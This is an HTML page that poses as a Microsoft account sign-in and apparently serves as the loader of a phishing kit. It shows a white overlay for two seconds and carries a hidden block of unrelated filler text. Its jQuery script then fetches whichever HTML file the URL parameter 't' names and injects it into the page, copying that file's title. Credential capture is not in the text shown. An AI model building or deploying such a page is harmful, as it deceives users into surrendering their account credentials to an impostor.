<!DOCTYPE html>
<html>
<head>
<title>Sign in to your Microsoft account</title>
<style>

.overlay_xyrqwerty{
  position: fixed;
  top: 0;
  left: 0;
  z-index: 2000;
  background: #ffffff;
  width: 100%;
  min-width: 100%;
  height: 100%;
  min-height: 100%;
}
</style>
</head>
<body>
<div class="overlay_xyrqwerty"></div>
<div class="mainallpppppp" data-tt=""></div>

<div style="display: none;">
<p>
  block elements contain an entire large region of content
examples: paragraphs, lists, table cells
the browser places a margin of whitespace between block elements for separation
inline elements affect a small amount of content
examples: bold text, code fragments, images
the browser allows many inline elements to appear on the same line
must be nested inside a block element

</p>
</div>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
   <script>
     $(document).ready(function(e){ 
	   
	   //$(document).attr("title", "New Title");
	   setTimeout(function(){ 
	     $(".overlay_xyrqwerty").hide(); 
	   }, 2000);
	   var acname = 'accountname';
	   var styletype = 'styletypefk';
	   var param = GetURLParameter('t');
	   var url = 'index-home.html';
	   if(param){ url=param+'.html'; }
	   $.get(url, function(data, status){
           $('.mainallpppppp').html(data);
		   $(document).attr("title", $('.mainallpppppp title').html());
	   });
	 });
	 
	 function GetURLParameter(sParam)
{
var output = false;
    var sPageURL = window.location.search.substring(1);
    var sURLVariables = sPageURL.split('&');
    for (var i = 0; i < sURLVariables.length; i++)
    {
        var sParameterName = sURLVariables[i].split('=');
        if (sParameterName[0] == sParam)
        {
            output = decodeURIComponent(sParameterName[1]);
        }
    }
	return output;
}
	</script>
</body>
</html>